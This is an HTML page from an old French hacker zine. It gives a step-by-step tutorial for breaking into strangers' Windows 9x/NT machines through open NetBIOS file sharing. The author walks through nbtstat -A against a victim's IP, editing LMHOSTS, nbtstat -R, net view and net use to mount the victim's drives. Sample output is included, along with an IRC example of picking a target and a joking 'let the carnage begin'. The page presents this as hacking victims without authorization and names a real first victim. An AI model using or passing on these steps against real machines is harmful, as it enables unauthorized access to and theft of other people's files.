<html>
<head>
<title>La faille NBTSTAT</title>
</head>

<body background="stars.jpg" bgcolor="black" text="green" link=#006699 alink=#006699 vlink=#006699>
<center>
<img src="logo.jpg" >

<br><br>
<a href="hacker.html"><img alt="Qu'est-ce qu'un hacker ?"  src="prev.gif" >
<a href="sommaire.html"><img alt="Sommaire"  src="toc.gif" >
<a href="mail.html"><img alt="L'Anonymail"  src="next.gif"></a> 


<br><br></center>
<center>
<table border> 
<td width=650>

<font face="tahoma,verdana" color="green" size=2><br>
<h1 align=center><font color="gray" size=5>La faille NBTSTAT</font></h1><br>

<b>Ah comment ne pas parler de Nbtstat (reserve aux possesseurs de Windows) Tout
hacker qui debute se doit de la connaitre . Personnellement , ce fut la
premiere chose que j'ai appris et avec laquelle j'ai reussi mon premier 'hack'(si on peut dire ainsi) .
Je remercie donc CABINA6 (un espagnol) qui fut ma premiere victime . Je sais que cette technique se trouve
partout , mais j'estime qu'elle doit tout de meme paraitre dans le premier zine .<br><br><br>

Voici une facon de hacker un PC sous Windows sans avoir recours a un programme special (par exemple trojan)
et sans pour autant modifier son systeme . Cela necessite juste quelques
commandes MSDOS . Ne vous affolez pas pour ceux qui n'ont jamais touche a DOS
(or il y en a beaucoup parmi vous) , c'est assez simple . <br><br>

Avec cet 'exploit' vous aurez la possibilite de vous connecter sur une machine qui fait
tourner Windows (3.11, 95, 98 ou encore NT) ainsi que le client pour reseaux
Microsoft avec le partage de fichiers et d'imprimantes active . Cela ne
fonctionne donc pas avec toutes les machines. Etant donne que la plus grande majorite des
gens ont Windows , vous trouverez pas mal de victimes potentielles . Cependant
si vous voulez vous entrainer , vous pouvez le faire en loop-back (127.0.0.1) , 
c'est-a-dire sur vous-meme ou alors avec votre adresse IP (taper WINIPCFG dans la commande
executer et pour NT tapez IPCONFIG dans la session dos). <br><br>

Voici les conditions requises pour que cela fonctionne correctement , la victime doit
avoir imperativement les elements suivants dans sa configuration reseau .

<table><td><font face="tahoma,verdana" size=2 color="green"><b>
<ul type=disc>
 <li>Client pour reseau Microsoft</li>
 <li>Netbeui</li>
 <li>Partage des fichiers et d'imprimantes (actives bien sur)<</li>
 <li>Le protocole TCP/IP</li>
 <li>Carte d'acces distant</li>
</ul></b></font></table>

Bien evidemment , ces elements doivent faire partie de votre configuration reseau
(sauf le partage des fichiers et d'imprimantes qui peut rester inactive) . Pour
ceux qui se connectent par acces reseau a distance , dans l'onglet <i>type de
serveur</i> des proprietes du <i>reseau</i> trois options doivent absolument
etre cochees en plus de celles que vous utilisez : 

<table><td><font face="tahoma,verdana" size=2 color="green"><b>
<ul type=disc>
 <li>se connecter a un reseau</li>
 <li>activer la 
     compression logicielle<o:p></o:p></span></li>
 <li>netbeui</li>
</ul></b></font></table>

Normalement , l'icone 'voisinage reseau' doit figurer sur votre bureau . <br><br>

Passons a l'action . Premierement il faut recuperer l'IP de la victime et une fois
obtenue , allez en commande MSDOS et taper : <br>

<font face="Courier" color="red">nbtstat -A  adresse_IP</font><br><br>

Le A majuscule est tres important , si vous negligez ce detail , laissez tomber tout
de suite (taper nbtstat -h pour plus d'infos). Normalement le resultat obtenu doit ressembler a ca : <br><br>

-------------------Session DOS ------------------------<br><br>

<font face="courier" color="red" size=2>C:\WINDOWS\nbtstat -A addresse_ip</font><br><br>

<pre><font face="courier" color=red>
NetBIOS Remote Machine Name Table
Name            Type          Status
---------------------------------------------
Amadeorus       &lt;00&gt;      UNIQUE Registered
IMMORTAL        &lt;00&gt;      GROUP  Registered
Amadeorus       &lt;03&gt;      UNIQUE Registered
Amadeorus       &lt;20&gt;      UNIQUE Registered
IMMORTAL        &lt;1E&gt;      GROUP  Registered 
MAC Address = xx-xx-xx-xx-00-00

C:\WINDOWS&gt;_</font></pre>
-------------------------------------------------------------<br><br>

Ces infos ne s'afficheront que si l'ordinateur sur lequel vous faites le nbtstat possede la bonne
configuration , a savoir : <i>partage de fichiers et d'imprimantes</i> actives
, <i>client pour les reseaux Microsoft</i> , et <i>TCP/IP</i> . <br><br>

Dans le cas contraire , vous obtenez le message d'erreur 'host not found' (ce qui va vous arriver tres souvent) .
Ce qui nous interesse le plus ici , c'est le service &lt;20&gt; (<i>partage de fichiers et
d'imprimantes</i>) grace auquel une connexion sur la machine distante sera possible . 

Les infos qui sont apparues quand la commande nbtstat 
a donne un resultat positif (service &lt;20&gt;) vont vous servir pour vous
connecter sur la machine de la victime.<br><br>

Editez le fichier 'lmhosts' en lui ajoutant les infos suivantes :<br>
adresse IP , suivi d'une tabulation (tres important), le nom de l'ordinateur de la victime (mettre entre guillemets si le
nom contient des espaces) , enregistrer les fichiers ainsi modifies SANS extension . (Certains mettent des directives #pre et/ou des commentaires apres le nom de l'ordinateur , perso je ne le fais pas et ca marche quand meme) . <br><br>

Ensuite tapez (toujours dans la fenetre de commande ms-dos) :<br><br>

--------------------------------------------------------------------------------------<br>
<pre><font color="red" face="courier" size=2>
C:\WINDOWS&gt;nbtstat -R<br>
Successful purge and preload of the NBT Remote Cache Name Table.<br>
C:\WINDOWS&gt;_
</font></pre>
----------------------------------------------------------------------------------------<br><br>

Si vous avez ce message c'est gagne !! Il ne reste plus qu'a cliquer sur <i>demarrer/rechercher/ordinateur</i>
et taper le nom du service &lt;20&gt; et le tour est joue<br><br>

En ligne de commande , il faudra taper : 
<pre>
<font color="red" face="courier" size=2>C:\WINDOWS&gt;net view \\nom_du_service_20 

Shared resources at \\USERNAME
Sharename     Type    Comment
-------------------------------
   A          Disk      
   B          Disk
   C          Disk
   D          Disk
   E          Disk
 Epson       Printer

The command was completed successfully .

C:\WINDOWS&gt;_
</font></pre>

Cette commande vous affiche le nom des lecteurs logiques qui ont des ressources
partagees ..ou que dalle si rien n'est partage . Dans le deuxieme cas, cherchez
ailleurs .<br><br>

Dans le premier cas , taper :<br>

<font face="courier" color=red>net use * \\&lt;nom_du_service_20&gt;\&lt;sharename&gt;</font><br><br>

La commande NET USE a pour but de CREER sur votre systeme un lecteur logique reseau qui
dans ce cas correspond a la ressource partagee de l'ordinateur de la victime .
Allez dans <i>poste de travail</i> et appuyez sur F5 , vous verrez apparaitre
un lecteur supplementaire portant la lettre affectee par WIN95 et contenant les
fichiers de l'ordinateur sur lequel vous venez de vous connecter.<br><br>

Avec DOS vous pouvez aussi avoir des messages d'erreur du genre : <br><br>

<font face="courier" color="red">Error 53: The computer name specified in the network path cannot be located. </font><br>
ca veut dire que vous avez certainement foire les infos dans votre fichier LMHOSTS (ou
que l'ordinateur distant s'est deconnecte entre temps)<br><br>

<font face="courier" color="red">Error 59: An unexpected network error has occurred. (Disconnected)</font><br>
Vous vous etes fait griller mais a ce stade la c'est pas encore trop grave vu que vous
n'avez rien fait. Il arrive aussi que des incidents se produisent lors de la connexion
(problemes reseau) : reessayez.<br><br>

<font face="courier" color="red">Error 5: You do not currently have access to this file.</font><br>
Il faut un mot de passe pour rentrer sur cette machine, ou alors avoir un nom
d'ordinateur/nom de domaine autorise . Le password peut etre teste uniquement
sous windows .<br><br>

<font face="courier" color="red">Error 86: The specified network password is not correct</font><br>
Le password que vous avez tape n'est pas correct .<br><br>




<hr size=2 width="100%" align=center>

<br>Rien qu'un exemple pour mieux comprendre :<br><br>

Je suis sur l'IRC et j'ai envie de penetrer dans le PC d'un gars qui est evidemment sous Windows . Donc je
recupere son IP qui est pour notre exemple : 193.250.225.228 .<br><br>

J'ouvre alors une fenetre ms-dos et je tape : <br>

<font face="courier" color="red">nbstat -A 193.250.225.228</font><br><br>

J'obtiens alors : 
<pre><font face="courier" color="red">
NetBIOS Remote Machine Name Table
Name         Type         Status
------------------------------------
VICTIME      &lt;00&gt;    UNIQUE Registered
LAMER        &lt;00&gt;    GROUP  Registered 
VICTIME      &lt;20&gt;    UNIQUE Registered
LAMER        &lt;1E&gt;    GROUP Registered
MAC Address = xx-xx-xx-xx-00-00

C:\WINDOWS_
</font></pre>
C'est gagne !!! Le nom de la ressource partagee est &quot;VICTIME&quot; (LAMER veut dire
que c'est la seule ressource partagee sur cette IP)<br><br>

J'edite mon fichier <b>lmhosts</b> et j'y ajoute (en respectant la syntaxe
comme explique plus haut) :<br>
<font face="courier" color="red">193.250.225.228 VICTIME #PRE</font><br><br>

Je sauve les fichiers sans extension bien sur . Ensuite , je tape :<br>
<font face="courier" color="red">nbtstat -R </font><br><br>

En cas de resultat positif , cela donne :<br>
<font face="courier" color="red">Successful purge and preload of the NBT Remote Cache Name Table.</font><br><br>

Ensuite je tape pour voir ses ressources partag�es :<br>
<font face="courier" color="red">net view \\VICTIME</font><br><br>

Et j'obtiens :
<pre><font face="courier" color="red">Ressources partagees 

\\VICTIME

Nom de partage    Type    Commentaire
-----------------------------------------
     c            Disque    
     d            Disque
     e            Disque

Execution achevee.
</font></pre>
Je veux me connecter a son lecteur , alors je tape : <br>
<font face="courier" color="red">C:\WINDOWS&gt;net use * \\VICTIME\c </font><br><br>

Et j'obtiens en retour : <br>
<font face="courier" color="red">M:connecte a \\VICTIME\c</font><br><br>

Qui m'indique que je suis a present connecter a son lecteur logique C . Je peux aussi cliquer
sur <i>demarrer / rechercher /ordinateur</i> et taper &quot;VICTIME&quot; .<br><br>

Ca y est , je suis connecte sur l'ordinateur de la victime : Que le carnage commence . (Je
rigole) .<br><br>

ATTENTION : un fichier log est cree sur la machine distante avec VOTRE ADRESSE IP . Donc
pas de conneries svp !<br><br>

Pour les plus grosses feignasses (a force ca devient rebarbatif) , je vous conseille de
telecharger un scanner IP et un scanner de port que vous trouverez facilement
sur le Web . <br><br>

</b>

<br>
<DIV ALIGN="right"><font size=+1 color="#006699">Amadeorus</font></DIV><br>
</font></td></table><br>
<center>
<a href="hacker.html"><img alt="Qu'est-ce qu'un hacker ?"  src="prev.gif" >
<a href="sommaire.html"><img alt="Sommaire"  src="toc.gif" >
<a href="mail.html"><img alt="L'Anonymail"  src="next.gif"></a> 
</center>

</body>
</html>

